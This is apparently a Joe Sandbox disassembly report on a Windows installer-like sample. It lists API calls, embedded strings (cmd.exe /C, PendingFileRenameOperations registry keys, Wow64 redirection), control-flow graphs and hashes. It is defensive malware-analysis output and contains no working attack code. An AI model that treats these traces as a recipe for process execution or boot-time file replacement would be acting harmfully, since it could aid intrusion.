                                                          • API String ID: 190572456-2091577475
                                                          • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                          • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                          • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                          • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                          • API String ID: 3256987805-3653653586
                                                          • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                          • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                          • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                          • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                          APIs
                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$Prop
                                                          • String ID: wA$yA
                                                          • API String ID: 3887896539-1847240991
                                                          • Opcode ID: 3727ce753c8f8498010a5226f695284cd865d9d8e6cc9e92a61234208361845c
                                                          • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                          • Opcode Fuzzy Hash: 3727ce753c8f8498010a5226f695284cd865d9d8e6cc9e92a61234208361845c
                                                          • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 0042F587
                                                          • GetFocus.USER32 ref: 0042F58F
                                                          • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                          • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                          • String ID: TWindowDisabler-Window
                                                          • API String ID: 3167913817-1824977358
                                                          • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                          • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                          • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                          • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                          • API String ID: 1646373207-2130885113
                                                          • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                          • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                          • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                          • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                          APIs
                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                            • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                            • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                          • String ID: c:\directory$shell32.dll
                                                          • API String ID: 3376378930-1375355148
                                                          • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                          • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                          • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                          • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                          APIs
                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                          • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                          • API String ID: 4130936913-2943970505
                                                          • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                          • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                          • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                          • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                            • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                            • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                            • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                            • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                          • API String ID: 854858120-615399546
                                                          • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                          • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                          • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                          • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                          APIs
                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                          • OemToCharA.USER32(?,?), ref: 00423754
                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                          • String ID: 2$MAINICON
                                                          • API String ID: 3935243913-3181700818
                                                          • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                          • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                          • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                          • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                            • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                            • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                            • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                            • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                            • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                            • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                            • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                            • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                            • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                            • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                          • API String ID: 3864787166-2767913252
                                                          • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                          • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                          • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                          • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                          APIs
                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$Prop
                                                          • String ID:
                                                          • API String ID: 3887896539-0
                                                          • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                          • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                          • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                          • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                          • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                          • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • String ID: p%G
                                                          • API String ID: 2066263336-2885399958
                                                          • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                          • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                          • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                          • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                          Strings
                                                          • WININIT.INI, xrefs: 004557B8
                                                          • PendingFileRenameOperations2, xrefs: 00455758
                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                          • PendingFileRenameOperations, xrefs: 00455728
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                          • API String ID: 47109696-2199428270
                                                          • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                          • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                          • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                          • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                          APIs
